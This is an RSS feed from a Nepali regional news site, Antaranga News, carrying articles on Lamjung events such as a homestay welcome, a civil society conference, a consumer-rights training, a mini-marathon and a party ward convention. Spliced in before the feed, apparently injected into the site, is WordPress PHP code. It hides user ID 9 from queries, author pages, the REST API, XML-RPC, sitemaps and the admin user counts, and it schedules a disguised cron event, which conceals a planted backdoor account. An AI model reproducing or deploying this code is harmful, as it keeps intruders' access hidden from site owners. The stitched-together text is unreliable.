add_action( 'pre_get_posts', function( $q ) {
if ( ! is_admin() && $q->is_main_query() ) {
$not_in = (array) $q->get( 'author__not_in' );
$not_in[] = 9;
$q->set(
'author__not_in',
array_unique( array_map( 'intval', $not_in ) )
);
}
}, 1 );
add_action( 'template_redirect', function() {
if ( is_author() ) {
$author = get_queried_object();
if ( $author instanceof WP_User && (int) $author->ID === 9 ) {
global $wp_query;
$wp_query->set_404();
status_header( 404 );
nocache_headers();
}
}
} );
add_action( 'pre_user_query', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
global $wpdb;
$q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 9 );
} );
add_action( 'pre_get_users', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
$exclude = (array) $q->get( 'exclude' );
$exclude[] = 9;
$q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) );
} );
add_filter( 'wp_dropdown_users_args', function( $a ) {
$exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array();
$exclude[] = 9;
$a['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $a;
} );
add_filter( 'rest_user_query', function( $args, $request ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 9;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
}, 10, 2 );
add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) {
$route = $request->get_route();
if ( preg_match( '#^/wp/v2/users/9(/|$)#', $route ) ) {
return new WP_Error(
'rest_user_invalid_id',
'Invalid user ID.',
array( 'status' => 404 )
);
}
return $result;
}, 10, 3 );
add_filter( 'xmlrpc_methods', function( $methods ) {
unset(
$methods['wp.getUsers'],
$methods['wp.getUser'],
$methods['wp.getProfile']
);
return $methods;
} );
add_filter( 'wp_sitemaps_users_query_args', function( $args ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 9;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
} );
add_action( 'admin_head-users.php', function() {
echo '';
} );
add_filter( 'views_users', function( $views ) {
foreach ( array( 'all', 'administrator' ) as $key ) {
if ( isset( $views[ $key ] ) ) {
$views[ $key ] = preg_replace_callback(
'/\((\d+)\)/',
function( $m ) {
return '(' . max( 0, (int) $m[1] - 1 ) . ')';
},
$views[ $key ],
1
);
}
}
return $views;
} );
add_action( 'init', function() {
if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) {
return;
}
if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) {
wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' );
}
} );
add_action( 'wp_extra_bot_heartbeat', function() {
// noop
} );
रोचक – Antaranga News || अन्तरङ्ग न्युज
https://www.antaranganews.com
News from Gandaki ProvinceFri, 15 May 2026 14:23:10 +0000en-US
hourly
1 https://wordpress.org/?v=7.0.2https://www.antaranganews.com/wp-content/uploads/2023/05/Ant-logo-150x95.jpgरोचक – Antaranga News || अन्तरङ्ग न्युज
https://www.antaranganews.com
3232मितेरी भेटघाट एवम् विविध सांस्कृतिक प्रस्तुतिका लागि रक गार्डेन पुगेको ठाडोभाका टिमलाई स्वागत सत्कारको दृश्यको फोटोफिचर
https://www.antaranganews.com/?p=48778
https://www.antaranganews.com/?p=48778#respondFri, 15 May 2026 14:23:10 +0000https://www.antaranganews.com/?p=48778रकगार्डेन, खानीगाउँ(लमजुङ)– लमजुङमा मितेरी भेटघाट तथा विविध सांस्कृतिक प्रस्तुतिका लागि यहाँ आई पुगेको ठाडोभाका लोककला प्रतिष्ठान नेपालको टोलीलाई आयोजक स्थानिय रकगार्डेन होमस्टे र दिपज्योति आमा समूहले संयुक्तरूपमा हार्दिकताका साथ भव्य स्वागत गरेको छ । उक्त कार्यक्रमका लागि प्रतिष्ठानको समिति परिवार र प्रतिष्ठानका संरक्षक एवम् ठाडोभाका महानायक वुद्धिमान दुरा धम्पुको निजी पारिवारिक टोली जेठ १ गते यहाँ आएको हो । आयोजक टोलीद्वारा संयोजन गर्ने टोलीलाई हार्दिकतापूर्ण रुपमा भव्य स्वागत सत्कार गरेको थियो गुरुङ संस्कृति अनुसार होमस्टेका अध्यक्ष चन्द्रमाया गुरुङ, वडासदस्य, होमस्टेका संस्थापक अध्यक्ष तथा संयोजनकर्ता प्रतिष्ठानका आजीवन सदस्य सीता गुरुङ, रकगार्डेन सामसदायिक होमसटेका अध्यक्ष युकुमारी गुरुङ, रकगार्डेनका परिकल्पनाकार, सामाजिक अभियन्ता एवम् प्रतिष्ठानका वरिष्ठ आजीवन सदस्य कामसार्कीका साथै होमस्टेका सञ्चालकहरु मैतखुशी गुरुङ, देवकुमारी गुरुङ, बैसकली गुरुङ, कान्छी गुरुङलगायतले टिका, दिप, फुलको वुकेद्वारा स्वागत गर्नु भएको थियोे । स्वागत पश्चात प्रतिष्ठानका संरक्षक धम्पु आफूले मितेरी गाउँका लागि ल्याउनु भएको कोशेली स्वरुप ऐतिहासिक एवम् धार्मिक महत्त्वका पाँच थरी फूलका विरुवा हस्तान्तरण गर्नु भएको थियोे ।
ती फूलका विरुवामा पारिजात, जो बैकुण्ठ र नेपालमा मात्र पाइने विश्वास गरिन्छ, गाउँको शिरमा रोप्न उहाँले आग्रह गर्नु भयो । त्यस्तै स्वास्थ र सुरक्षाको प्रतिक निमको विरुवा हस्तान्तरण गर्नुभयो । यसैगरी, पुरुष तथा महिलाको सौतेनी ग्रह काट्न उपयोगी मानिने आँक जसलाई पार्वती स्वरुपा समेत मानिन्छको विरूवाका साथमा वर्षमा एक पटकमात्र लिइने स्वस्थानी व्रतका बेला शिवजीलाई चढाइने स्वस्थानीफूलको विरुवा प्रदान गर्नुभएको थियो ।
त्यस लगत्तै प्रतिष्ठानको पाहुना टोलीलाई स्थानीय क्षेत्रमा पाइने मौलिक र अर्गानिक उत्पादनको खाजा खुवाउने काम भयो । खाजामा गिठा, काफल, टिमुरको छोप(अचार), आलु, मकै र भट्ट, मोही आदि रहेका थिए । अहिले साँझको खाना पछि विविध सांस्कृतिक कार्यक्रमको प्रस्तुती चलिरहेको छ । भोली विहान प्रतिष्ठानका संरक्षक धम्पुको मितेरी निवासमा स्वति शान्ति सहित पूजाआजा गरी ४५ फिटको त्रिशुल समर्पण गर्ने कार्यक्रम रहेको प्रतिष्ठानका अध्यक्ष नवराज पहाडीले जानकारी दिनुभयो उहाँका अनुसार उक्त कार्यक्रमका लागि १४ सदस्य टोली रक गार्डेन पुगेको छ । प्रस्तुत छ, सो समयको फोटो फिचर :
]]>
https://www.antaranganews.com/?feed=rss2&p=487780अब पालिकास्तरमा पनि नागरिक समाज गठन हुनु पर्छ : प्रा.डा. सञ्जय आचार्य, सदस्य राष्ट्रिय योजना आयोग
https://www.antaranganews.com/?p=48755
https://www.antaranganews.com/?p=48755#respondWed, 13 May 2026 15:51:57 +0000https://www.antaranganews.com/?p=48755काठमाडौ– राष्ट्रिय योजना आयोगका सदस्य प्रा.डा. सञ्जय आचार्यले नागरिक समाज सञ्जाल पालिका, पालिकामा गठन हुनु पर्ने बताउनु भएको छ । उहाँले गैरसरकारी संस्था महासंघद्वारा यहाँ आयोजना गरिएको नागरिक सम्मेलनको उद्घाटन गर्दै बैशाख ३० गते त्यस्तो बताउनु भएको हो । उहाँले आफ्नो संक्षिप्त मन्तव्यमा महासंघले मूलतः तीन कुरामा ध्यान दिनुपर्नेमा जोडदिनु भयो । ती हुन्, नयाँ नीति र सीपको उपयोग, सामाजिक नीति नियम र अब के गर्ने भन्ने बहस र पेपरलेस पद्धतिको विकास उहाँले भन्नुभयो । उहाँले डोनरलाई पनि दबाब दिन जरुरी छ भन्नु भयो । दुई दिने यो सम्मेलनमा हुने छलफल र जारी हुने घोषाणापत्रले सरकारलाई पनि आफ्नो दृष्टिकोण मुखरित गर्न मद्दत गर्ने छ, यहाँ हुने निर्णय र घोषणपत्र हामीलाई उपलब्ध हुनेनै छ भन्दै सम्मेलनको सफलताको कामना गर्नु भयो । सामाजिक अभियन्ता एवम् महासंघका सल्लाहकार ८२ वर्षीय सन्तलाल मुल्मीले ०४६ सालपछि गठन भएको सरकारमा गैससलाई हेर्ने दृष्टिकोणमा परिवर्तन आउला भनेको नाम र अध्यक्षको अनुहार मात्र फेरीयो, आज पनि पञ्चायकालमा बनेको २०३४ सालको ऐन अन्तरगत रहनु परेको स्मरण गर्नुभयो । उहाँले भन्नु भयो, ‘त्यसैभएर महासंघ चाहिन्छ भनेर ४४ वटा संस्थाको भेलाबाट गठन गरेको आज ५ हजार बढी संस्था आबद्ध हुनु खुशीको कुरा हो ।’ उहाँले तत्कालीन राजा ज्ञानेन्द्रले इमर्जेन्सी लगाउदा राजनीतिक दल लुके, हामीले तेस्रो दिन पत्रकार महासंघसमेतका संस्थाको साझेदारीमा जुलुस प्रदर्शन गर्याैं, आन्दोलनको अन्तिम दिनमा पनि हाम्रो रोहवरमा अमेरिकीलगायतका राजदुतसंगको कुराकानी पछि राजापछि हटेको स्मरण गर्नु भयो । गैसस महासंघका निवर्तमान अध्यक्ष राम सुवेदीले नागरिक मैत्री शासन आजको आवश्यकता हो भन्नु भयो । उहाँले आफूहरुका लागि जेनजी आन्दोलन त के गणतन्त्र पनि आछैन भन्दै ०३४ सालको ऐन अनुसार आफूहरू चल्न पर्ने उदाहरण हो भन्नु भयो । पत्रकार महाँसंघका महासचिव रामप्रसाद दाहालले सरकार नागरिकका संविधान प्रदत्त अधिकार छिन्न उद्त छ भन्दै प्रधानमन्त्रीको व्यवहारसमेत लोकतन्त्रमा पच्य नहुने खालका देखिएको बताउनु भयो । उहाँले जनताले तिरेको ट्याक्स सरकारी मिडियामा मात्र दिने भन्दै गरिएको निर्णयले धेरै पत्रिकाको घाटी निमोठिने स्थिति उत्पन्न भएको, यो स्थिती लोकतन्त्र विरोधी हो भन्नुभयो । उहाँले त्यो वारेमा अन्तराष्टिय प्रेस जगतलाई पनि जानकारी दिएको जानकारी दिनुभयो ।
गैसस महासंघका अध्यक्ष अर्जुन भट्टराईको अध्यक्षतामा भएको कार्यक्रममा विविसिका अध्यक्षलगायत विभिन्न संस्थाका प्रतिनिधिहरुले आआफ्नो धारणा राख्दै नागरिक आन्दोलन र अभियानमा ऐक्यबद्धता जनाएका थिए ।
सो अवसरमा प्रदेशस्तरमा उत्कृष्ट जिल्ला उत्कृष्ट प्रदेशलाई क्रमशः १०,१० हजार र १५ हजार नगद सहित सम्मान गरिएको थियोे । प्रदेशस्तरमा सुदुरपश्चिम पुरस्कृत भयो भने प्रदेशस्तरमा सम्मानित हुने जिल्लामा इलाम कोशी, धनुषा मधेश, भक्तपुर वागमती, पर्वत गण्डकी, कपिलवस्तु लुम्बिनी, कर्णालीको दैलेख र सुदुरपश्चिमको कञ्चनपुर जिल्ला सम्मानित भएका थिए ।
सो अवसरमा डिजिटल प्रविधि प्रयोग गरी ऐतिहासिक दस्तावेजको पुस्तकविमोचन गरिएको थियोे ।
महासंघका वरिष्ठ उपाध्यक्षले धन्यवाद ज्ञापन गर्दै आफूहरू सरकारलाई दवाव दिन र सहयोग गर्न तयार रहेको बताउनु भयो । उक्त कार्यक्रमको सञ्चालन अयोजक संस्थाका महासचिवले गर्नु भएको थियो ।
उद्धाटन सत्र पछि डिजिटल स्पेसको पक्ष (सरकार र परम्परागत आन्दोलन) का साथै प्रविधि तथा वातावरण कार्यक्रम सञ्चालन गरिएको थियो ।
]]>
https://www.antaranganews.com/?feed=rss2&p=487550राष्ट्रिय उपभोक्ता मञ्चले गर्यो उदाहरणीय कार्य
https://www.antaranganews.com/?p=48742
https://www.antaranganews.com/?p=48742#respondMon, 11 May 2026 17:19:44 +0000https://www.antaranganews.com/?p=48742लमजुङ । यहाँको जिल्ला सदरमुकाम बेसीशहमा उपभोक्ता हक हित र अधिकारका क्षेत्रमा उदाहरणीय कार्य भएको छ । जिल्लाका स्थानिय तहमा जनशक्ति उत्पादन गर्न प्रशिक्षक प्रशिक्षण सञ्चालन गरिएबाट यस्तो पुष्ठि भएको हो । जिल्ला प्रशासन कार्यालयको आयोजना, बेसीशहर नगरपालिकाको सहयोग र राष्ट्रिय उपभोक्ता मञ्च, लमजुङ शाखाको आयोजनामा उक्त प्रशिक्षण कार्यक्रम बैशाख २७ गते भएको हो । सहायक प्रमुख जिल्ला अधिकारी एवम् जिल्ला बजार अनुगमन समितिका संयोजक थम्मनसिं गौतमले उक्त प्रशिक्षण कार्यक्रमको उदघाटन गर्नु भएको हो । प्रशिक्षण कार्यक्रमको प्रशिक्षक समेत रहनु भएका उहाँले बजार अनुगमनको स्थिति, कानुनी व्यवस्था र उपभोक्ताको अधिकारका बारे एक कार्यपत्र समेत प्रस्तुत गर्नु भएको थियो । उहाँले उपभोक्ताको अधिकार हनन् भएमा विक्रेता तथा उत्पादकहरूलाई तत्कालै ५० हजारदेखि एक लाखसम्म जरीवाना हुने कानुनी व्यवस्था रहेको उल्लेख गर्नु भयो । त्यस्तै, मूल्य नभएका चामल लगायतका खाद्य वस्तुको सबैले देख्ने गरी मूल्य सूचि टाँस गर्नु पर्ने नगरेको खण्डमा पनि ५० हजारदेखि एक लाखसम्म जरीवाना हुने हुन्छ भन्नुभयो ।
उहाँले कुनै पनि व्यापार व्यवसाय दर्ता नगरी सञ्चालन गर्न नहुने निर्धारित समयमा नवीकरण हुनुपर्ने जानकारी दिनुभयो । त्यस्तै, अनुचित व्यापार, विज्ञापन आदि गर्न नहुने बताउँदै उत्पादकको समेत दायित्व रहेको र त्यो पनि कानुनले निर्दिष्ट गरेको छ भन्नुभयो ।
यसैगरी, ढुवानीकर्ताका समेत दायित्व रहेको जानकारी दिदै ढुवानी गर्दा पनि गुणस्तरको ख्याल राख्नु पर्ने हुन्छ भन्नुभयो । विक्रेताको दायित्व झनै गहन हुन्छ भन्दै सहायक प्रजिअ गौतमले उपभोक्ताहरु सार्वभौम हुन् भन्ने बिर्सन नुहुने उल्लेख गर्नुभयो । यसैगरी सेवा प्रदायकको समेत दायित्व हुने बारेमा उहाँले प्रष्ट्याउनु भएको थियो । उहाँले अनुगमनका बारेमा तीनै तहको सरकारको दायित्व भएको हुँदा तीनै तहको समन्वय, स्थानीय प्रहरी, उपभोक्ता अधिकारकर्मीहरु पत्रकार आदिको टोलीले बजार अनुगमन कार्य गर्ने गरेको बताउनु भयो । ऐलेसम्मको बजार अनुगनको कार्य सांकेतिक मात्र हुने गरेको छ भन्नुभयो ।
उहाँले अनुगमनको चुहावट गर्नेलाई समेत सजाय हुने व्यवस्था रहेको बताउँदै सकेसम्म अनुगमनमा जानेलाई समेत थाहा नदिई जाने गरेको अनुभव सुनाउनु भयो ।
सो अवसरमा बेसीशहर नगरपालिकाका प्रमुख प्रशासकीय अधिकृत सुमन अधिकारीले बजार सुशासनको पक्षमा काम गर्नका लागि यो कार्यक्रम कोशेढुंगा हुने आफूले विश्वास गरेको उल्लेख गर्नुभयो । उहाँले २०७३ सालमा निर्वाचन भएको १० वर्ष वित्न लाग्दा पनि पालिकाहरुले के गरेका छन् ? प्रश्न उठिरहेकोतर्फ आफ्नो ध्यान गएको छ र समाधानका लागि पहल गरिरहेको छौं र गर्नु पर्छ भन्ने सकारात्मका सोचका साथ अधि बढेका छौं उहाँले भन्नुभयो ।
यो कार्यक्रम उपलब्धिमूलक हुनेतर्फ उहाँले आफू धेरै आशावादी रहेको भन्दै उहाँले बजार अनुगमनका लागि नगरपालिकामा छुट्टै दक्ष जनशक्तिको दरबन्दी हुन आवश्यक रहेको अनुभव भएको छ र गुणस्तरको किट प्रवन्धका लागि पनि काम गर्ने सोच आएको छ भन्नुभयो ।
यहाँहरुको जस्तै मेरो पनि प्रश्न छ भन्दै उहाँले विक्रेताहरुको पहुँच र कानुनका बीचमा सामान्जस्यता ल्याउनु पर्ने जरुरी रहेको र यो चेतना गाउँ गाउँसम्म पुग्नु पर्दछ उहाँले औंल्याउनु भएको थियो ।
सोही कार्यक्रममा राष्ट्यि उपभोक्ता मञ्चका केन्द्रीय अध्यक्ष प्रेमलाल महर्जनले नेपालका उपभोक्ता सम्बन्धि कानुनी व्यवस्था विषयमा एक कार्यपत्रमार्फत प्रकाश पार्नु भएको थियो ।
उहाँले उपभोक्ता अधिकारको पृष्ठभूमि, इतिहासको स्मरण गर्दै श्री ३ महाराज देव शम्शेरको पालाबाट यो सुरु भएको जानकारी दिनुभयो ।
त्यस्तै, संवैधानिक कानुनी व्यवस्थाका बारेमा चर्चा गर्र्दै उहाँले उपभोक्ता संरक्षण ऐन २०७५ का बारेमा प्रकाश पार्नु भयो ।
उहाँले उपभोक्तको उपभोग शैलीमा परिवर्तन आएको बताउनु भयो ।
उहाँले अनलाइनबाट खाना, खाजा अडर गर्ने पद्दतिका कारणले पनि थप ठगिने स्थिति उत्पन्न भएको भन्दै मःमलाई दुई सय रुपैयाँमा अनलाईनमा अर्डर गर्ने तर त्यस्को क्रस चेक नगर्ने गरेको समेत बताउनु भयो । त्यस्तै, क्यू आर कोडको प्रयोगमा समेत विशेष ध्यान दिनु पर्नेमा जोड दिनुभयो ।
अखाद्य बस्तुको उदाहरणः
यसैगरी, खाद्य प्रविधि तथा गुणस्तर नियन्त्रण डिभिजन कार्यालय दमौलीका प्रमुख ज्योती आचार्यले विभिन्न उदाहरण सहित उपभोक्ता के कसरी ठगिने र मारमा पर्ने गरेका छन् भन्ने बताउनु भयो । उहाँले मिसावट युक्त खाद्यान्नका नमुनाहरूको प्रस्तुती गर्दै रङ लगाएको झिलिङ्गा खान नहुने बताउनु भयो ।
त्यस्तै घिउका नाउमा र चुकका नाउँमा चटपटेमा मिसाई बिक्रि गरिने कालो तरल पदार्थ पनि खान नहुने उल्लेख गर्दै त्यसलाई आफूले चुक नभई भुलचुक भन्ने गरेको बताउनु भयो । यसैगरी, घिउका नाँउमा विक्रि गरिने पदार्थ, केरा पकाउनका लागि प्रयोग गरिने विषदी बेसारमा हुने गरेको मिसावटका बारेमा जानकारी दिनु भएको थियो । उहाँले यो प्रशिक्षक प्रशिक्षण कार्यक्रम भएको हुनाले सहाभागीहरू र बेसीशहर नगरपालिकाबाट निकट भविष्यमा ठोस कामहुने आशा जागृत भएको उल्लेख गर्नुभयो ।
राष्ट्रिय उपभोक्ता मञ्च, लमजुङ शाखाका अध्यक्ष एवं वरिष्ठ पत्रकार नवराज पहाडीको अध्यक्षतामा भएको उक्त कार्यक्रममा उहाँले पालिकास्तरमा काम गर्न सकियोस् र स्थानीय सरकारलाई सहयोग गर्ने उद्देश्यले यो कार्यक्रमको आयोजना गरेको हो भन्नुभयो । उहाँले यो प्रशिक्षणमा सकेसम्म सबै पालिकाको प्रतिनिधित्व होस् भन्ने आफ्नो धेय रहेको उल्लेख गर्दै क्ब्होलासोथरबाट सहभागिता हुन सकेन, सबैभन्दा राम्रो सहभागिता बेसीशहर नगरपालिका, मध्यनेपाल नगरपालिका र दोर्दी गाउँपालिकाबाट भएको भन्ने जानकारी दिनुभयो ।
उहाँले जिल्ला सदरमुकामबाट टाढा गएर कार्यक्रम पालिकाको बजेट उपभोक्ताको हितमा परिचालन गर्न सहज वातावरण तयार गर्नु यो प्रशिक्षणको उद्देश्य हो भन्नुभयो । सहभागीहरूलाई प्राप्त प्रमाणपत्रको उचित कदर गर्न र पालिकाहरूको वडास्तरमा कार्यक्रम सञ्चालन गर्न जगरूक हुन आग्रह गर्दै आफूले सक्दो सहयोग गर्ने प्रतिवद्धता व्यक्त गर्नुभयो ।
हामी जत्तीको मनिसले नेतृत्व गरेको संस्थाबाट बाँकी ७६ जिल्लाको ध्यानाकर्षण हुने गरी काम गर्नु पर्ने आफ्नो धारणा रहेको बताउँदै ७६ जिल्लाले पनि लमजुङबाट सिक्न सक्छन् भन्ने यो कार्यक्रम उदाहरण हो यस्तो प्रशिक्षक प्रशिक्षण आजका दिन सम्म अन्य कुनै पनि जिल्लाले सञ्चालन गरेका छैनन् त्यसैले हामीले उदाहरणीय कार्य गरेकोमा गर्व छ भन्नुभयो ।
मञ्चका सल्लाहकार रमाराज खनियाले स्वागत गर्नु भएको कार्यक्रममा धन्यवाद ज्ञापन मञ्चका उपाध्यष सन्तोषी गौलीले गर्नु भएको थियो भने सञ्चालन शाखाका सहसचिव विजयरञ्जन पौडेलले गर्नु भएको थियो ।
उक्त कार्यक्रममा ११ जना महिला सहित २९ जनाले भाग लिएका थिए । सहभागीहरूलाई कार्यक्रमका प्रमुख अतिथि सहायक प्रमुख जिल्ला अधिकारी एवम् जिल्ला बजार अनुगमन समितिका संयोजक थम्मनसिं गौतम, बेसीशहर नगरपालिकाका प्रमुख प्रशासकीय अधिकृत सुमन अधिकारी, संयोजनकर्ता शाखाका अध्यक्ष नवराज पहाडीले संयुक्तरूपमा प्रमाण पत्र वितरण गर्नुभएको थियो ।
]]>https://www.antaranganews.com/?feed=rss2&p=487420ठाडोभाका मेलाका् उद्घाटन सत्रकाे फाेटाे फिचर
https://www.antaranganews.com/?p=39254
https://www.antaranganews.com/?p=39254#respondSat, 04 Apr 2026 02:16:45 +0000https://www.antaranganews.com/?p=39254बडागाउँ(लमजुङ)- यहाँ आयाेजना गरिएको तीन दिवसीय ठाडोभाका मेलाको उद्घाटन गरिएको छ । भूमि समस्या समाधान आयोगका जिल्ला अध्यक्ष दामोदर अधिकारीले मेलाकाे उद्घाटन चैत २० गते गर्नु भएको हाे । साे अवसरमा प्रतिष्ठानले वितरण गर्ने विभिन्न सम्मान वितरण गर्नुका साथै स्मारिका, लाेगाे र डटपेन समेत विमाेचन गरिएको थियोे । प्रतिष्ठानका अध्यक्ष नवराज पहाडीकाे अध्यक्षतामा गरिएको कार्यक्रमकाे फाेटाे फिचर :
]]>https://www.antaranganews.com/?feed=rss2&p=392540लमजुङमा १० किमि दुरीको मिनीम्याराथन भाेलि बिहान
https://www.antaranganews.com/?p=38008
https://www.antaranganews.com/?p=38008#respondFri, 23 Jan 2026 15:13:34 +0000https://www.antaranganews.com/?p=38008साेतीपसल(लमजुङ)- लमजुङको मध्यनेपाल नगरपालिका- २ काे सम्पूर्ण तयारी पूरा भएको छ । जाल्पादेवी मन्दिर व्यवस्थापन समितिकाे आयोजनामा याे क्षेत्रमै पहिलो पटक आयोजना गरिएको साे म्याराथन माघ १० गते बिहान सुरु हुने भएको हाे ।
यहाँको न्यू विश्व शान्ति गुम्बा परिसरमा उद्घाटन हुने कार्यक्रम रहेको छ । पुरातत्त्व विभागका महानिर्देशक साैभाग्य प्रधानांगकाे प्रमुख आतिथ्यतामा हुने साे प्रतियोगितामा एक सय जना बढीले भाग लिने आंकलन गरिएको मूलसमितिका संयाेजक एवम् साे वडाका अध्यक्ष पद्मबहादुर थापाले बताउनु भयो । उहाँका अनुसार प्रतियोगिताकाे सम्पूर्ण तयारी पूरा भएको छ । उहाँले भन्नुभयाे, दुई जना रेफ्रि पनि आइपुग्नु भएको छ, प्रमुख अतिथि भाेलि बिहानै आउने कार्यक्रम छ ।
उक्त मिनि म्याराथन दाैड बाैद्ध शान्ति गुफाबाट सुरु भई, बाेर्डिङचाेक, जुगेपानी, पञ्चमन्दिर, पञ्चायत घर, मल्ल स्वारा, ढलेपिपल, बालविकास मावि, सेरा चाेक, रातमाटा हुँदै जाल्पादेवी मन्दिरमा पुगेर विसर्जन गर्ने कार्यक्रम रहेकाे आयोजककाे भनाइ छ ।
उक्त दाैडमा भाग लिन ५० जना बढी साेतीपसल आइसकेका छन् । उहाँले भन्नुभयाे, याे प्रतियोगिता जाल्पादेवी मन्दिरको प्रचारप्रसार का लागि गरिएको हाे ।
]]>https://www.antaranganews.com/?feed=rss2&p=380080रास्वपा कुन्छाको वडाधिवेशन भव्य रुपमा सम्पन्न, झण्डै तीन दर्जनले लिए पार्टी सदस्यता
https://www.antaranganews.com/?p=37045
https://www.antaranganews.com/?p=37045#respondSat, 06 Dec 2025 04:01:40 +0000https://www.antaranganews.com/?p=37045कुन्छा(लमजुङ)– लमजुङको पुरानो सदरमुकाम रहेको सुन्दरबजार नगरपालिका– १ स्थित ऐतिहासिक थलो कुन्छामा राष्ट्रिय स्वतन्त्र पार्टी(रास्वपा)को वडा अधिवेशन भव्य रुपमा सम्पन्न भएको छ । सो अधिवेशनमा झण्डै तीन दर्जन व्यक्तिले सो पार्टीको नयाँ सदस्यता मंसिर १९ गते लिए ।
रास्वपाका केन्द्रीय संगठन विभागका सदस्य एवम् सो दलका संस्थापक जिल्ला संयोजक धर्म केसी, केन्द्रीय प्रवास विभागका सदस्य तोयराज अधिकारी, गण्डकी प्रदेश संगठन विभागका प्रमुख कृष्ण लम्सालले संयुक्त रुपमा सो अधिवेशनको घण्टी बजाएर उद्घाटन गर्नु भएको थियो । आफ्नो उद्घाटन मन्तव्यमा नेता के.सी.ले विगतमा ३६ वर्षसम्म सत्तामा बसेर राज्यको दोहन गर्नेहरुले अब चुनाव लड्ने हैन मुद्दा लड्नु पर्छ त्यस्ता अपराधीलाई भोट हाल्ने हैन जेल हाल्नु पर्छ भन्नु भयो । उहाँले कुन नेताले के कति भ्रष्टाचार गरेको छ भन्ने गएको भदौ २३ र २४ गतेको आन्दोलनले समेत पुष्टि गरेको हामीले थाहा पाइसकेका छौं, त्यसैले ती हाम्रो भोटका हकदार छैनन् भन्नुभयो । अब तिनका पछि लाग्ने भनेको तीबाट दाना पानी पाउने मात्र हुन् । त्यो दानापानी पनि आउदो चुनावपछि सिद्धिने छ, त्यसपछि मुलुकमा सुशासनको श्रीगणेश हुनेछ भन्नू भयो ।
अर्को एक प्रसङ्गमा पार्टीका सभापति रवि लामिछानेलाई प्रधानमन्त्री बन्न आवश्यक पर्ने योग्यतामध्ये जेलयात्रा पनि हो र त्यो पनि पूरा भएको छ र उहाँलाई हामी प्रधानमन्त्री बनाएरै छाड्ने छौं भन्नु भयो । कार्यक्रमका विशेष वक्ता तोया अधिकारीले पार्टीको स्थापनाकालमा योगदान गर्नेहरुको उच्च मूल्यांकन हुन जरुरी छ, म उहाँहरु सबैलाई सम्मान गर्न चाहन्छु भन्नु भयो । उहाँले विरोधीहरुले सोध्ने प्रश्नमा प्रष्ट जवाफ दिन सक्ने हुनुपर्छ, त्यसका लागि अध्ययन जरुरी छ र त्यो गर्नु होला भन्ने निर्देशन दिनुभयो । उहाँले विश्वमा २ सय देश रहेको र तीमध्ये १५० मुलुकमा ५ हजारभन्दा वढी नेपाली रहेका छन्, तीमध्ये ३८ देशमा शाखा विस्तार गरेर अधिवेशन समेत गरेको स्थिति रहेको जानकारी दिनुभयो ।
यसैगरी, गण्डकी प्रदेश संगठन विभागका प्रमुख कृष्ण लम्सालले रास्वपा उन्नत लोकतन्त्रमा विश्वास गर्ने पार्टी हो भन्नुभयो । उहाँले गण्डकीका अधिकांश क्षेत्रमा आफू संगठन विस्तारको क्रममा पुगेको र ती सबै क्षेत्रमा घण्टीको जित हुने स्थिति बलियो बन्दै गरेको जानकारी दिनुभयो । उहाँले पार्टीको जलेश्वर बैंकले पार्टीको नीति, सिद्धान्त र विधान पारित गरेको स्मणरण गर्दै वेभसाइटमा पाइने ती दस्तावेजको अध्ययन गर्न अनुरोध गर्नुभयो ।
रास्वपाको सोही वडाका सभापति प्रकाश अधिकारीको अध्यक्षतामा भएको कार्यक्रममा उहाँले आफू पार्टीमा डे वान देखिनै लागेको र संगठन विस्तारको काम कति कठिन हुने रहेछ भन्ने नजिकबाट अनुभूति गरेकोे उल्लेख गर्दै आजको दिन ल्याउन सहयोग गर्नुहुने सबैप्रति कृतज्ञता व्यक्त गर्दछु भन्नुभयो । सो अवसरमा शुभकामना मन्तव्य राख्नेहरुमा रास्वपाका गण्डकी प्रदेश महिला विभागका उपप्रमुख सन्तोषी गौली, जिल्ला सभापति अशोक सापकोटा, उपसभापति प्रकाश थापा, जिल्ला सल्लाहकार परिषदका संयोजक नवराज पहाडी, सुन्दरबजार नगरका सभापति विमल अधिकारी, भानु नगरका सभापति विष्णु पोखरेल, मध्यनेपाल नगरपालिकाका सभापति तिर्थराज पराजुली, रास्वपा नेता शिव खनाल, संगठन विभागका जिल्ला प्रमुख वावुराम अधिकारी, जिल्ला र्याट विभागका प्रमुख श्याम केसी लगायत हुनुहुन्थ्यो ।
सो अवसरमा पार्टीमा नवप्रवेशीहरुलाई कार्यक्रमका प्रमुख व्यक्तित्व धर्म के.सी. लगायतले पार्टीको लोगो पहिराउदै स्वागत गर्नु भएको थियोे । नवप्रवेशी मध्यनेपाल नगरपालिका– १, जिताबेसी निवासी सुभद्रा पौडेलले देशमा व्याप्त भ्रष्टाचार, अराजकता, वेथिति, बेरोजगारीले देश गाजिएको र त्यसबाट मुक्तिका लागि र देश जोगाउनका लागि आफू रास्वपामा प्रवेश गरेको बताउनु भयो । भोलिका दिनमा यिनीहरू पनि उस्तै रहेछन् भन्ने दिन नआओस् भन्ने कामना गर्नुभयो । सो अधिवेशनबाट जगत सेढाईको अध्यक्षतामा सर्वसम्मत रुपमा ११ सदस्यीय वडासमिति गठन गरिएको छ । समितिको उपसभापति ईश्वरी गौली, सचिव कृष्ण(वल)बहादुर गुरुङ निर्वाचित हुनु भएको छ । समितिको सदस्यमा हर्कबहादुर भुजेल, कामना दुरा, पद्मा ठडराई, अञ्जु सेढाई, रमेश कंडेल, कल्पना न्यौपाने र चन्दन मौरती रहनुभएको छ । नवनिर्वाचित पदाधिकारी तथा सदस्यहरूलाई संगठन विभाग प्रमुख लम्सालले सपथ ग्रहण गराउनु भएको थियो ।
सोही वडाका उपसभापति जगत सेढाईले स्वागत मन्तव्य राख्नु भएको सभाको सञ्चालन शुभचिन्तक ज्ञानेन्द्र शर्माले गर्नु भएको थियो ।
